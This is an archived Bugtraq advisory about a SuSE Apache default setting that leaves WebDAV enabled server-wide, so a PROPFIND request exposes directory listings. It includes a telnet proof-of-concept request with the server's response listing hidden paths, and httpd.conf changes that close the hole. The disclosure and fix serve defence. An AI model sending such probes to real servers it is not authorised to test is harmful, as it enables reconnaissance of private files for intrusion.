SuSE Apache WebDAV Directory Listings Vulnerability

BID:1656

Info

SuSE Apache WebDAV Directory Listings Vulnerability

Bugtraq ID: 1656
Class: Configuration Error
CVE:
Remote: Yes
Local: Yes
Published: Sep 07 2000 12:00AM
Updated: Sep 07 2000 12:00AM
Credit: This vulnerability was originally submitted to bugtraq by mnemonix ([email protected]) on 7 Sep 2000.
Vulnerable: SuSE Linux 7.0
SuSE Linux 6.4 ppc
SuSE Linux 6.4 alpha
SuSE Linux 6.4
SuSE Linux 6.3 ppc
SuSE Linux 6.3 alpha
SuSE Linux 6.3
SuSE Linux 6.2
SuSE Linux 6.1 alpha
SuSE Linux 6.1
SuSE Linux 6.0
Apache Apache 1.3.12
+ NetScreen NetScreen-Global PRO Express Policy Manager Server
+ NetScreen NetScreen-Global PRO Policy Manager Server
+ OpenBSD OpenBSD 2.8
+ Redhat Linux 7.0 i386
 + Redhat Linux 7.0 alpha
 + Redhat Linux 6.2 sparc
 + Redhat Linux 6.2 i386
 + Redhat Linux 6.2 alpha
 + Sun Cobalt ManageRaQ v2 3599BD
+ Sun Cobalt Qube3 4000WG
+ Sun Cobalt RaQ XTR 3500R
+ Sun Cobalt RaQ4 3001R
+ SuSE Linux 7.0 sparc
 + SuSE Linux 7.0
Not Vulnerable:

Discussion

SuSE Apache WebDAV Directory Listings Vulnerability

WebDAV (Web Distributed Authoring and Versioning) is an extension of HTTP which allows users to create, edit and share documents using the HTTP protocol. A particular REQUEST METHOD, PROPFIND, allows users to retrieve resource properties such as displayname, date last modified, and others. Apache web server as installed by SuSE 6.4 has WebDAV enabled for the entire file structure of the server. By making a specific, properly structured request to the Apache web server, it is possible to obtain information which is equivalent to a directory listing.

Exploit / POC

SuSE Apache WebDAV Directory Listings Vulnerability

A request of the web server similar to the following will yield directory information:

suse~: # telnet 127.0.0.1 80
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
PROPFIND / HTTP/1.1
Host: suse
Content-Type: text/xml
Content-Length: 110

<?xml version="1.0"?>
<a:propfind xmlns:a="DAV:">
<a:prop>
<a:displayname/>
</a:prop>
</a:propfind>

HTTP/1.1 207 Multi-Status
Date: Sun, 20 Aug 2000 17:38:58 GMT
Server: Apache/1.3.12 (Unix) (SuSE/Linux) mod_fastcgi/2.2.2 DAV/0.9.14
mod_perl/1.21 PHP/3.0.15
Transfer-Encoding: chunked
Content-Type: text/xml; charset="utf-8"

dc1
<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response>
<D:href>/secret/secret/sql_tool.shtml</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/secret/secret/change-passwd.shtml</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/secret/secret/add-user.shmtl</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/secret/secret/</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/secret/</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/webalizer/</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/test.php3</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/date.php3</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/linbot/</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/robots.txt</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/index.html</D:href>
<D:propstat>
<D:prop>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/gif/u_arrow.gif</D:href>
<D:propstat>
<D:prop>
</D:prop>
..
- ---cut-----

Solution / Fix

SuSE Apache WebDAV Directory Listings Vulnerability

Solution:
Add the following entries in httpd.conf for each directory you want open to WebDAV:

<Directory /webdav/directory/goes/here>
#add other directives as needed such as Order allow,deny
<IfDefine DAV>
DAV On
</IfDefine>
</Directory>

Stop and restart Apache.

To completely disable WebDAV, find the following entries in httpd.conf:

<IfDefine DAV>
DAV On
</IfDefine>

and change "On" to "Off".

By default there only "/usr/local/httpd/htdocs" is the only directory with the
IfDefine DAV directive. Other directories with this directive will also need to be changed.

Stop and restart Apache.

To start Apache without the WebDAV module, edit
/etc/rc.d/rc3.d/S20apache and comment out ("#") the following line:

test -e /usr/lib/apache/libdav.so && MODULES="-D DAV $MODULES"

The next time Apache is started, this module will not be included.


SuSE Linux 6.0

SuSE Linux 6.1

SuSE Linux 6.2

SuSE Linux 6.3

SuSE Linux 6.4

SuSE Linux 7.0

References

SuSE Apache WebDAV Directory Listings Vulnerability

References:
© CVE.report 2026 |

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report